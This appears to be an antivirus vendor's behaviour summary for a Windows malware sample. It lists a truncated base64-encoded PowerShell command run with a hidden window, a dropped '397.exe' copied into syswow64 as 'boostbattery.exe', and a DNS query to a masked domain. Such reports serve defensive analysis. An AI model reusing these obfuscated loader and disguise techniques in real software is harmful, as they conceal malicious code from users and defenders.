Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAUwB3AGkAeAB5AGgAYgBiAGkAdgBnAGgAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ASwBtAGsAdwBtAGkAZABzAHUAIAAjAD4AIAAkAEwAeQBwAGgAdABtAGsAcgA9ACcAUABmAHIAeA...
- %HOMEPATH%\397.exe
- %HOMEPATH%\397.exe в %WINDIR%\syswow64\boostbattery.exe
- DNS ASK ma###panda.com
- '%HOMEPATH%\397.exe'
- '%WINDIR%\syswow64\boostbattery.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAUwB3AGkAeAB5AGgAYgBiAGkAdgBnAGgAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ASwBtAGsAdwBtAGkAZABzAHUAIAAjAD4AIAAkAEwAeQBwAGgAdABtAGsAcgA9ACcAUABmAHIAeA...' (со скрытым окном)